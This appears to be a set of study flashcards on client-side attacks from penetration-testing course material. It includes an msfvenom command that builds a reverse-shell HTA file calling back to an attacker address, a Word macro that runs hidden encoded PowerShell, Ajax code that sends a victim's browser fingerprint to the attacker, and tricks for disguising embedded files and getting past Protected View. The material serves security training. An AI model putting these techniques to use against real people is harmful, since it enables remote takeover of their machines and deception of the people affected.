What tool is used for web browser fingerprinting?
Fingerprintjs2
How do we get the broswer fingerprint on a victim machine?
- download fingerprintjs2
- unzip into /var/www/html
- Rename the main directory and move into it’s own directory named ‘fp’:
- - mv fingerprintjs2-master/ fp - Start apache2 server
- Get the victim to browse to the fingerprint2 page at /fp/index.html
- Get the fingerprint data from the fingerprint.txt file using Ajax
How do we get the output of the victim browser fingerprint saved to the attacking machine?
- the default settings of the index.html file save the browser footprint data to the victim machine
- we can instead place Ajax code into the index.html web page that does the browser fingerprinting, and instruct the output to be sent to our attacking machine as an xmlhttp post request and saved as /fp/js.php
- ** the following code gets placed w/in Fingerprint2.get function of index.html ***
- var clientfp = “Client browser fingerprint: “ + murmur + “\n\n”;
- var xmlhttp = new XMLHttpRequest();
- xmlhttp.open(“POST”, “/fp/js.php”);
- xmlhttp.setRequestHeader(“Content-Type”, “application/text”);
- xmlhttp.send(clientfp + timeString + details);
- PHP code then processs the POST request on the attacking server
- In order for this to work, the Apache www-data user needs to be allowed to write to the ‘ftp’ directory
What is a .hta file?
- If a file is created with the extension .hta instead of .html, IE will automatically interpret it as a “HTML Application” (HTA) and offer the ability to execute it using the ‘mshta.exe’ program
- This allows an attacker to execute arbitrary code with the user’s permissions, avoiding the security restrictions normally imposed by IE
How can HTA be used to execute shell commands?
- ** This attack vector allows us to compromise a Windows client through IE
- ActiveXObjects provide access to underlying operating system commands
- This is achieved through WScript (Windows Script Host) Shell Object
- Once we instantiate a WScript Shell object, we can invoke its ‘run’ method in order to launch an application on the target client machine.
How to create an HTA attack?
- use msfvenom with the ‘hta-psh’ output format
- sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
What command in PowerShell prevents the PowerShell user profile from loading?
- -nop
- - -NoProfile
What command in PowerShell prevents PowerShell from creating a window on the user’s desktop?
- -w hidden
- - -WindowStyle hidden
What are the steps to get a reverse shell on a victim machine with a .hta file created in Msfvenom?
- Create evil.hta with msfvenom
- Host the evil.hta file on Apache2 server
- Launch a Netcat listener
- The user navigates to URL with evil.hta
- User accepts two security warnings
- Get reverse shell
What is one of the oldest and best-known client-side software attack vectors?
Microsoft Word Macro
What is a Macro?
- a series of commands and instructions that are grouped together to accomplish a task programmatically
- Macros can be written from scratch in Visual Basic for Applications (VBA)
What is VBA?
- Visual Basic for Applications
- Fully functional scripting language with full access to ActiveX objects and the WScript Host
What is similar to a ‘function’ in VBA?
- Sub procedure
- the difference between a Sub procedure and Function is that Sub procedures cannot be used in expressions
How is a macro inserted into a Word or Excel document?
- View > Macros
Create a simple macro that opens cmd.exe
– Sub MyMacro()
– CreateObject(“Wscript.Shell”).Run “cmd”
– End Sub
What macro procedure call a custom procedure when a new document is created?
Sub AutoOpen()
What macro procedure call a custom procedure when an already-open document is reopened?
Sub Document_Open()
Which Word extensions support embedded macros?
- .docm
- .doc
- ** .docx does not support them
How can we use a macro to get a reverse shell?
- Create Msfvenom shellcode and base64 encode
- Declare a variable Dim of the type String containing the PowerShell command we wish to execute
- Run Netcat listener
- Start the Word document and get reverse shell
What would the MyMacro process look like with the Dim variable and Powershell command?
- Sub MyMacro()
- Dim Str As String
– Str = “powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ”
– Str = Str + “QB3AC0A…”
– Str = Str + “TAHAAcgBlAGEAb…”
…….
– Str = Str + “QA=”
– CreateObject(“Wscript.Shell’”).Run Str
– End Sub
What is OLE and how can you leverage it as a Client Side attack?
- OLE = Object Linking and Embedding
- It can be used to abuse Microsoft Office’s document-embedding feature by embedding a Windos batch file inside of a Microsoft Word document
How do you craft an OLE attack?
- Create batch file (ex launch.bat)
- Open Word
- Insert > Object > Create from File > select launch.bat
- Check ‘Display as icon’ > Change Icon > Excel Icon with “ReadMe.xls” file name
What is Protected View?
- When files originate from outside of the network (ex. email or download link), we must bypass another layer of security known as the “Protected View”
- Protected View disables all editing and modifications in the document and blocks the execution of macros or embedded objects
What may be a better vector than Word and Excel? Why?
- Microsoft Publisher
- Does not enable Protected View for Internet-delivered documents
- Still allows embedded objects and code execution
-
Introduction51
-
Information Gathering68
-
Web Application Attacks39
-
Buffer Overflows42
-
Client-Side Attacks26
-
File Transfers20
-
Antivirus Evasion7
-
Privilege Escalation79
-
Password Attacks34
-
Port Redirection and Tunneling31
-
Active Directory Attacks50
-
Metasploit1
-
PowerShell Empire34
-
Assembling the Pieces1
